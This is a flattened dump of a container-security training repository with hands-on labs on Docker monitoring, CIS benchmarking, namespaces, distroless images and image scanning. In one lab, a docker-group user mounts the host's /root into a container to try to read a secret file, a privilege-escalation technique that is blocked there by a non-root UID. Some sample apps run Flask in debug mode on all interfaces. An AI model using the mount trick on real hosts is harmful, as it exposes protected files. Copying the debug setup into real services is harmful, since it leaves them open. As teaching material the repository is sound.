9 | 10 | 11 | if __name__ == '__main__': 12 | app.run(debug=True, host='0.0.0.0') 13 | -------------------------------------------------------------------------------- /Container/Docker-Hands-On/helloworld/requirements.txt: -------------------------------------------------------------------------------- 1 | Click==7.0 2 | Flask==1.0.2 3 | itsdangerous==0.24 4 | Jinja2==2.10 5 | MarkupSafe==1.0 6 | Werkzeug==0.14.1 7 | -------------------------------------------------------------------------------- /Container/Docker-Hands-On/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/Open-Terminal.png -------------------------------------------------------------------------------- /Container/Docker-Hands-On/img/docker-exec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-exec.png -------------------------------------------------------------------------------- /Container/Docker-Hands-On/img/docker-images-list.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-images-list.png -------------------------------------------------------------------------------- /Container/Docker-Hands-On/img/docker-ps-a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-ps-a.png -------------------------------------------------------------------------------- /Container/Docker-Hands-On/img/docker-ps.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-ps.png -------------------------------------------------------------------------------- /Container/Docker-Hands-On/img/docker-pull.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-pull.png -------------------------------------------------------------------------------- /Container/Docker-Hands-On/img/docker-rm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-rm.png -------------------------------------------------------------------------------- /Container/Docker-Hands-On/img/docker-rmi-images.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-rmi-images.png -------------------------------------------------------------------------------- /Container/Docker-Hands-On/img/docker-run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-run.png -------------------------------------------------------------------------------- /Container/Docker-Hands-On/img/docker-stop.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/docker-stop.png -------------------------------------------------------------------------------- /Container/Docker-Hands-On/img/exit-docker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/exit-docker.png -------------------------------------------------------------------------------- /Container/Docker-Hands-On/img/open-app.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/open-app.png -------------------------------------------------------------------------------- /Container/Docker-Hands-On/img/open_terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Hands-On/img/open_terminal.png -------------------------------------------------------------------------------- /Container/Docker-Monitoring/README.md: -------------------------------------------------------------------------------- 1 | ## Auditd for Docker monitoring 2 | 3 | 4 | ##### Step 1: 5 | 6 | * Install `auditd` 7 | 8 | ```bash 9 | apt install auditd 10 | ``` 11 | 12 | * Run `service auditd status` to check if `auditd` service is running. If the service is not runninig, run `service auditd start`. 13 | 14 | 15 | ![](img/auditd-1.png) 16 | 17 | 18 | ##### Step 2: 19 | 20 | * Create an audit rule to watch for Read, Write, Execute and Attribute changes on `docker-daemon` logging them to a logfile by appending 21 | docker-daemon label at end of each log-entry to make logs easier to query. 
This can be done by running: 22 | 23 | `auditctl -w /usr/bin/docker -p rwxa -k docker-daemon` 24 | 25 | * auditctl is for temporary use till system is shutdown. For a more permanent approach, add rule in rules.d/ and run 'augenriles --check'. 26 | If there's a difference, run 'augenrules --load' to load the new rules 27 | 28 | 29 | ![](img/auditd-2.png) 30 | 31 | 32 | ##### Step 3: 33 | 34 | * Create, Launch, Run and Stop a few containers for Auditd to log. 35 | 36 | ![](img/auditd-3.png) 37 | 38 | 39 | ##### Step 4: 40 | 41 | * To search logs based on the label given(`docker-daemon`), run `ausearch -k docker-daemon`. 42 | 43 | ![](img/auditd-4.png) 44 | 45 | 46 | ##### Step 5: 47 | 48 | * For a count of executable events run on system that day, run `ausearch --start today --raw | aureport -x --summary` 49 | 50 | ![](img/auditd-5.png) 51 | 52 | ##### Step 6: 53 | 54 | * Run `clean-docker` to stop all running containers -------------------------------------------------------------------------------- /Container/Docker-Monitoring/img/auditd-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Monitoring/img/auditd-1.png -------------------------------------------------------------------------------- /Container/Docker-Monitoring/img/auditd-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Monitoring/img/auditd-2.png -------------------------------------------------------------------------------- /Container/Docker-Monitoring/img/auditd-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Monitoring/img/auditd-3.png 
-------------------------------------------------------------------------------- /Container/Docker-Monitoring/img/auditd-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Monitoring/img/auditd-4.png -------------------------------------------------------------------------------- /Container/Docker-Monitoring/img/auditd-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-Monitoring/img/auditd-5.png -------------------------------------------------------------------------------- /Container/Docker-bench/README.md: -------------------------------------------------------------------------------- 1 | ## Dockerbench 2 | 3 | ###### Docker-bench checks for common best-practices inspired from Docker-CIS-Benchmark when deploying docker containers in production. 
(https://benchmarks.cisecurity.org/tools2/docker/CIS_Docker_Community_Edition_Benchmark_v1.1.0.pdf) 4 | 5 | * SSH into your Virtual Lab or open Terminal, if you're on the VM 6 | 7 | * Navigate to Docker-bench Lab Folder 8 | 9 | ```commandline 10 | cd /root/labs/container_training/Container/Docker-bench 11 | ``` 12 | 13 | * Run docker bench command 14 | 15 | ```commandline 16 | docker run -it --net host --pid host --userns host --cap-add audit_control -e DOCKER_CONTENT_TRUST=$DOCKER_CONTENT_TRUST -v /var/lib:/var/lib -v /var/run/docker.sock:/var/run/docker.sock -v /usr/lib/systemd:/usr/lib/systemd -v /etc:/etc --label docker_bench_security docker/docker-bench-security 17 | ``` 18 | 19 | ![](img/cmd.png) 20 | 21 | * Run `clean-docker` to stop all the containers -------------------------------------------------------------------------------- /Container/Docker-bench/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-bench/img/Open-Terminal.png -------------------------------------------------------------------------------- /Container/Docker-bench/img/cd-path.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-bench/img/cd-path.png -------------------------------------------------------------------------------- /Container/Docker-bench/img/cmd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Docker-bench/img/cmd.png -------------------------------------------------------------------------------- /Container/Limiting-Docker-Capabilities/img/Open-Terminal.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Limiting-Docker-Capabilities/img/Open-Terminal.png -------------------------------------------------------------------------------- /Container/Network-Namespace/README.md: -------------------------------------------------------------------------------- 1 | # Network Namespace 2 | 3 | 4 | ##### Step 1: 5 | 6 | * Get the list of network interfaces on the machine. 7 | 8 | ```bash 9 | ifconfig -a 10 | ``` 11 | 12 | 13 | ##### Step 2: 14 | 15 | * Get the iptables info. 16 | 17 | ```bash 18 | iptables -L 19 | ``` 20 | 21 | 22 | ##### Step 3: 23 | 24 | * Get the default network gateways. 25 | 26 | ```bash 27 | route -n 28 | ``` 29 | 30 | 31 | ##### Step 4: 32 | 33 | * Add a Networking Namespace. 34 | 35 | ``` 36 | ip netns add NetNameSpace 37 | ``` 38 | 39 | 40 | ##### Step 5: 41 | 42 | * Get the list of Network Namespaces 43 | 44 | ```bash 45 | ip netns list 46 | ``` 47 | 48 | 49 | ##### Step 6: 50 | 51 | * Exec into the Network Namespace and get the list of network interfaces on the 'NetNameSpace' Network Namespace. 52 | 53 | ```bash 54 | sudo ip netns exec NetNameSpace bash 55 | 56 | ifconfig -a 57 | ``` 58 | 59 | 60 | ##### Step 7: 61 | 62 | * Verify that there is no iptables available, since this is a new networking stack. 63 | 64 | ```bash 65 | iptables -L 66 | ``` 67 | 68 | * Verify that there is no default gateway, inside a new container. 69 | 70 | ```bash 71 | route -n 72 | ``` 73 | 74 | 75 | ##### Step 8: 76 | 77 | * Exit from the Network Namespace. 
78 | 79 | ```bash 80 | exit 81 | ``` 82 | 83 | 84 | ##### Step 9: 85 | 86 | * Run `ip netns list` to verify the Network Namespace and delete it 87 | 88 | ```bash 89 | ip netns list 90 | 91 | sudo ip netns del NetNameSpace 92 | ``` 93 | -------------------------------------------------------------------------------- /Container/Network-Namespace/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Network-Namespace/img/Open-Terminal.png -------------------------------------------------------------------------------- /Container/Network-Namespace/img/netns-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Network-Namespace/img/netns-1.png -------------------------------------------------------------------------------- /Container/Network-Namespace/img/netns-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Network-Namespace/img/netns-2.png -------------------------------------------------------------------------------- /Container/Network-Namespace/img/netns-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Network-Namespace/img/netns-3.png -------------------------------------------------------------------------------- /Container/Network-Namespace/img/netns-4.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Network-Namespace/img/netns-4.png -------------------------------------------------------------------------------- /Container/Network-Namespace/img/netns-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Network-Namespace/img/netns-5.png -------------------------------------------------------------------------------- /Container/Network-Namespace/img/netns-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Network-Namespace/img/netns-6.png -------------------------------------------------------------------------------- /Container/Network-Namespace/img/netns-7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Network-Namespace/img/netns-7.png -------------------------------------------------------------------------------- /Container/Non-Root Container/README.md: -------------------------------------------------------------------------------- 1 | ## Container Breakout - Non-Root Container 2 | 3 | ### Volume Mounts 4 | 5 | * ssh into the container virtual lab or open Terminal in the VM 6 | 7 | ``` 8 | ssh root@ 9 | password: 10 | 11 | ``` 12 | 13 | * Run `whoami` to confirm that you are the `root` user. 14 | 15 | ```commandline 16 | root@we45:~# whoami 17 | root 18 | root@we45:~# 19 | ``` 20 | 21 | * Validate that there's a secrets file in the root dir with `cat secret.txt` 22 | 23 | * Run `sudo su we45` to login as a normal user. 
24 | 25 | ```commandline 26 | root@we45:~# sudo su we45 27 | we45@we45:~$ 28 | ``` 29 | 30 | * Check if the user `we45` has access to `docker` by running `docker images` and `docker ps` 31 | 32 | ```commandline 33 | we45@we45:~$ docker images 34 | we45@we45:~$ docker ps 35 | ``` 36 | 37 | * Run `cat /root/secret.txt` read the content of `secret.txt` file that was created by `root` user. 38 | 39 | ```commandline 40 | we45@we45:~$ cat /root/secret.txt 41 | cat: /root/secret.txt: Permission denied 42 | ``` 43 | 44 | * Run `docker run -ti --rm -u 1000 -v /root:/hostFS/ alpine sh` as `we45`(non-root user) 45 | 46 | 47 | * Run `cat /hostFS/secret.txt` to view the content of the file. 48 | 49 | ```commandline 50 | /hostFS/root # cat secret.txt 51 | cat: can't open '/hostFS/secret.txt': Permission denied 52 | ``` 53 | 54 | * Run `exit` to exit from the container. 55 | 56 | ```commandline 57 | /hostFS/root # exit 58 | we45@we45:~$ 59 | ``` 60 | 61 | * Run `clean-docker` to stop all the containers 62 | 63 | ```commandline 64 | root@we45:~$ clean-docker 65 | ``` -------------------------------------------------------------------------------- /Container/README.md: -------------------------------------------------------------------------------- 1 | # [Containers](README.md) 2 | 3 | 4 | ##### Container Tech Deep-Dive 5 | 6 | * [Union-Mount-File-System](Union-Mount-File-System/README.md) 7 | 8 | * [Network-Namespace](Network-Namespace/README.md) 9 | 10 | * [Docker-Hands-On](Docker-Hands-On/README.md) 11 | 12 | * [Dive - Analysing Docker Images](dive/README.md) 13 | 14 | 15 | ##### Container Attacks 16 | 17 | * [Container Breakout](container-breakout/README.md) 18 | 19 | * [Docker Daemon Configuration](Docker-Daemon-Configuration/README.md) 20 | 21 | * [Trojanized Docker Images](Trojanized-Docker-Image/README.md) 22 | 23 | * [Vulnerable/Outdated Libraries](Vulnerable-Libraries-ShellShock/README.md) 24 | 25 | 26 | ##### Container Security Deep-Dive 27 | 28 | * [Limiting Docker 
Capabilities](Limiting-Docker-Capabilities/README.md) 29 | 30 | 31 | ##### Container Security Mitigations 32 | 33 | * [Non-Root Container](Non-Root%20Container/README.md) 34 | 35 | * [Distroless](distroless/README.md) 36 | 37 | * [SecComp](seccomp/README.md) 38 | 39 | * [AppArmor](AppArmor/README.md) 40 | 41 | * [Limiting Docker CAPs](Limiting-Docker-Capabilities/README.md) 42 | 43 | * [Resource Management](Resource-Management/README.md) 44 | 45 | ##### Monitor Docker 46 | 47 | * [OsQuery](OSQuery/README.md) 48 | 49 | * [Docker Monitoring](Docker-Monitoring/README.md) 50 | 51 | 52 | ##### Container Vulnerability Assessment 53 | 54 | * [Clair](Clair/README.md) 55 | 56 | * [Docker-bench](Docker-bench/README.md) 57 | 58 | * [Anchore](Anchore/README.md) 59 | -------------------------------------------------------------------------------- /Container/Resource-Management/README.md: -------------------------------------------------------------------------------- 1 | ## Resource Management 2 | 3 | 4 | **Note:** 5 | ```commandline 6 | --storage-opt Storage driver 7 | --cpus Number of CPUs 8 | -m Memory Size 9 | 10 | ``` 11 | 12 | * Run `docker run -it --storage-opt size=10G -m=4M --cpus=".5" ubuntu:latest /bin/bash` 13 | 14 | 15 | ##### Step 2: 16 | 17 | * Run `clean-docker` to stop all containers. 18 | 19 | ```commandline 20 | (venv)root@we45: clean-docker 21 | 92200af86b18 22 | ca94dab2d52e 23 | 92200af86b18 24 | 34c4adcf326d 25 | 86cd73d03ef1 26 | ca94dab2d52e 27 | "docker rmi" requires at least 1 argument. 28 | See 'docker rmi --help'. 29 | 30 | Usage: docker rmi [OPTIONS] IMAGE [IMAGE...] 
31 | 32 | Remove one or more images 33 | 34 | ``` -------------------------------------------------------------------------------- /Container/Trojanized-Docker-Image/img/trojan-docker-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Trojanized-Docker-Image/img/trojan-docker-1.png -------------------------------------------------------------------------------- /Container/Trojanized-Docker-Image/img/trojan-docker-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Trojanized-Docker-Image/img/trojan-docker-2.png -------------------------------------------------------------------------------- /Container/Trojanized-Docker-Image/img/trojan-docker-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Trojanized-Docker-Image/img/trojan-docker-3.png -------------------------------------------------------------------------------- /Container/Trojanized-Docker-Image/img/trojan-docker-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Trojanized-Docker-Image/img/trojan-docker-4.png -------------------------------------------------------------------------------- /Container/Trojanized-Docker-Image/img/trojan-docker-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Trojanized-Docker-Image/img/trojan-docker-5.png 
-------------------------------------------------------------------------------- /Container/Trojanized-Docker-Image/img/trojan-docker-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Trojanized-Docker-Image/img/trojan-docker-6.png -------------------------------------------------------------------------------- /Container/Trusted-Images/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Trusted-Images/img/Open-Terminal.png -------------------------------------------------------------------------------- /Container/Trusted-Images/img/docker-hub.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Trusted-Images/img/docker-hub.png -------------------------------------------------------------------------------- /Container/Union-Mount-File-System/README.md: -------------------------------------------------------------------------------- 1 | # Union Mount FileSystem 2 | 3 | 4 | ##### Step 1: 5 | 6 | * Install union-fs 7 | 8 | ```bash 9 | apt install unionfs-fuse tree 10 | ``` 11 | 12 | * Create Three Folders named `Folder-1`, `Folder-2` and `mnt` 13 | 14 | ```bash 15 | mkdir Folder-1 Folder-2 mnt 16 | ``` 17 | 18 | ![](img/ufs-1.png) 19 | 20 | 21 | ##### Step 2: 22 | 23 | * Create sub-directories and files in `Folder-1` and `Folder-2` 24 | 25 | ```bash 26 | mkdir -p Folder-1/Dir1 Folder-2/Dir1 Folder-2/Dir2 27 | 28 | touch Folder-1/File1.txt Folder-1/Dir1/dir1.txt Folder-1/Dir1/one.txt 29 | 30 | touch Folder-2/Dir1/file2.txt Folder-2/Dir1/two.txt Folder-2/Dir2/dir2_file.txt Folder-2/File2.txt 31 | ``` 32 | 33 | 
![](img/ufs-2.png) 34 | 35 | 36 | ##### Step 3: 37 | 38 | * Check the structure of directories that have been created 39 | 40 | ```bash 41 | tree . 42 | ``` 43 | 44 | ![](img/ufs-3.png) 45 | 46 | 47 | ##### Step 4: 48 | 49 | * Run `unionfs-fuse -o dirs=Folder-1:Folder-2 mnt/` . The directories and files in `Folder-1` and `Folder-2` will be mounted on `mnt` 50 | 51 | ```bash 52 | unionfs-fuse -o dirs=Folder-1:Folder-2 mnt/ 53 | ``` 54 | 55 | ![](img/ufs-4.png) 56 | 57 | 58 | ##### Step 5: 59 | 60 | * Check the structure of `mnt/` 61 | 62 | ```bash 63 | tree mnt 64 | ``` 65 | 66 | ![](img/ufs-5.png) 67 | 68 | 69 | ##### Step 6: 70 | 71 | * To unmount, run `umount -l mnt` 72 | 73 | ```bash 74 | umount -l mnt 75 | ``` 76 | 77 | ![](img/ufs-6.png) 78 | 79 | 80 | ##### Step 7: 81 | 82 | * Remove the directories sub-directories and files created 83 | 84 | ```bash 85 | rm -rf Folder-1 Folder-2 mnt 86 | ``` 87 | -------------------------------------------------------------------------------- /Container/Union-Mount-File-System/img/ufs-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Union-Mount-File-System/img/ufs-1.png -------------------------------------------------------------------------------- /Container/Union-Mount-File-System/img/ufs-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Union-Mount-File-System/img/ufs-2.png -------------------------------------------------------------------------------- /Container/Union-Mount-File-System/img/ufs-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Union-Mount-File-System/img/ufs-3.png 
-------------------------------------------------------------------------------- /Container/Union-Mount-File-System/img/ufs-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Union-Mount-File-System/img/ufs-4.png -------------------------------------------------------------------------------- /Container/Union-Mount-File-System/img/ufs-5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Union-Mount-File-System/img/ufs-5.png -------------------------------------------------------------------------------- /Container/Union-Mount-File-System/img/ufs-6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Union-Mount-File-System/img/ufs-6.png -------------------------------------------------------------------------------- /Container/Vulnerable-Libraries-ShellShock/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Vulnerable-Libraries-ShellShock/img/Open-Terminal.png -------------------------------------------------------------------------------- /Container/Vulnerable-Libraries-ShellShock/img/defaced.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Vulnerable-Libraries-ShellShock/img/defaced.png -------------------------------------------------------------------------------- /Container/Vulnerable-Libraries-ShellShock/img/shellshock-browser.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/Vulnerable-Libraries-ShellShock/img/shellshock-browser.png -------------------------------------------------------------------------------- /Container/container-breakout/img/remove_tmux.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/container-breakout/img/remove_tmux.png -------------------------------------------------------------------------------- /Container/container-breakout/img/split_pane.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/container-breakout/img/split_pane.png -------------------------------------------------------------------------------- /Container/container-breakout/img/terminate_process.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/container-breakout/img/terminate_process.png -------------------------------------------------------------------------------- /Container/container-breakout/img/tmux-greenband.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/container-breakout/img/tmux-greenband.png -------------------------------------------------------------------------------- /Container/distroless/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:2.7-slim AS build-env 2 | ADD . 
/app 3 | WORKDIR /app 4 | RUN pip install --upgrade pip 5 | RUN pip install -r ./requirements.txt 6 | 7 | FROM gcr.io/distroless/python2.7 8 | COPY --from=build-env /app /app 9 | COPY --from=build-env /usr/local/lib/python2.7/site-packages /usr/local/lib/python2.7/site-packages 10 | WORKDIR /app 11 | ENV PYTHONPATH=/usr/local/lib/python2.7/site-packages 12 | CMD ["app.py"] 13 | 14 | 15 | -------------------------------------------------------------------------------- /Container/distroless/README.md: -------------------------------------------------------------------------------- 1 | ## Distroless Docker 2 | 3 | * Run: `cd /root/labs/container_training/Container/distroless` 4 | * Run: `docker build -t distroless_flask_py .`. Wait for docker to build 5 | * Run: `cd /root/labs/container_training/Container/distroless/distroful` 6 | * Run: `docker build -t distroful_flask_py .`. Wait for docker to build 7 | * Run: `docker run -d -p 5432:5432 --name db arminc/clair-db:2019-01-01` 8 | * Run: `docker run -d -p 6060:6060 --link db:postgres --name clair arminc/clair-local-scan:v2.0.1`. 9 | 10 | **Wait 10 seconds for Clair and DB to start** 11 | 12 | * Run: `cd /root/labs/container_training/Container/Clair` 13 | * Run: `./clair-scanner --ip -r clair_report.json distroless_flask_py` 14 | * Run: `./clair-scanner --ip -r clair_report.json distroful_flask_py`. 
Observe the results 15 | 16 | * Run: `clean-docker` -------------------------------------------------------------------------------- /Container/distroless/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/distroless/__init__.py -------------------------------------------------------------------------------- /Container/distroless/app.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | 3 | from flask import Flask 4 | 5 | app = Flask(__name__) 6 | 7 | @app.route('/', methods = ['GET']) 8 | def main_route(): 9 | return "Hello World" 10 | 11 | if __name__ == '__main__': 12 | app.run(debug = True, host = '0.0.0.0') 13 | -------------------------------------------------------------------------------- /Container/distroless/distroful/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:14.04 2 | ADD . 
/app 3 | WORKDIR /app 4 | RUN apt-get update && apt-get install -y python-pip 5 | RUN pip install -r requirements.txt 6 | CMD ["python", "app.py"] 7 | -------------------------------------------------------------------------------- /Container/distroless/distroful/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/distroless/distroful/__init__.py -------------------------------------------------------------------------------- /Container/distroless/distroful/app.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | 3 | from flask import Flask 4 | 5 | app = Flask(__name__) 6 | 7 | @app.route('/', methods = ['GET']) 8 | def main_route(): 9 | return "Hello World" 10 | 11 | if __name__ == '__main__': 12 | app.run(debug = True, host = '0.0.0.0') 13 | -------------------------------------------------------------------------------- /Container/distroless/distroful/requirements.txt: -------------------------------------------------------------------------------- 1 | flask 2 | -------------------------------------------------------------------------------- /Container/distroless/requirements.txt: -------------------------------------------------------------------------------- 1 | flask 2 | -------------------------------------------------------------------------------- /Container/dive/README.md: -------------------------------------------------------------------------------- 1 | ## Exploring docker image and layer contents with dive 2 | 3 | * ssh into the host or open terminal on VM 4 | * run `dive abhaybhargav/vul_flask`. 
Wait for Image Analysis and details -------------------------------------------------------------------------------- /Container/dive/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/dive/img/Open-Terminal.png -------------------------------------------------------------------------------- /Container/extra/container/Anchore/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | services: 3 | anchore-engine: 4 | image: docker.io/anchore/anchore-engine:latest 5 | #privileged: true 6 | depends_on: 7 | - anchore-db 8 | ports: 9 | - "8228:8228" 10 | - "8338:8338" 11 | volumes: 12 | - /anchore_config:/config/:z 13 | logging: 14 | driver: "json-file" 15 | options: 16 | max-size: 100m 17 | environment: 18 | # NOTE: this should be set to the same name as this service (e.g. 
anchore-engine) 19 | - ANCHORE_HOST_ID=dockerhostid-anchore-engine 20 | - ANCHORE_ENDPOINT_HOSTNAME=anchore-engine 21 | anchore-db: 22 | image: "postgres:9" 23 | volumes: 24 | - /anchore_db:/var/lib/postgresql/data/pgdata/:z 25 | environment: 26 | - POSTGRES_PASSWORD=mysecretpassword 27 | - PGDATA=/var/lib/postgresql/data/pgdata/ 28 | logging: 29 | driver: "json-file" 30 | options: 31 | max-size: 100m 32 | #uncomment to expose a port to allow direct/external access to the DB, for debugging 33 | #ports: 34 | # - "2345:5432" -------------------------------------------------------------------------------- /Container/extra/container/Anchore/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Anchore/img/Open-Terminal.png -------------------------------------------------------------------------------- /Container/extra/container/Authentication-Attacks-against-Host/img/Open-Terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Container/extra/container/Authentication-Attacks-against-Host/img/Open-Terminal.png -------------------------------------------------------------------------------- /Container/extra/container/Container-Orchestrators/Docker-Compose/conf.d/app.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 80; 3 | server_name localhost; 4 | 5 | location / { 6 | proxy_set_header Host $host; 7 | proxy_set_header X-Real-IP $remote_addr; 8 | proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; 9 | proxy_set_header X-Forwarded-Proto $scheme; 10 | proxy_set_header Host $http_host; 11 | 12 | proxy_pass http://helloworld:5000; 13 | } 14 | } 
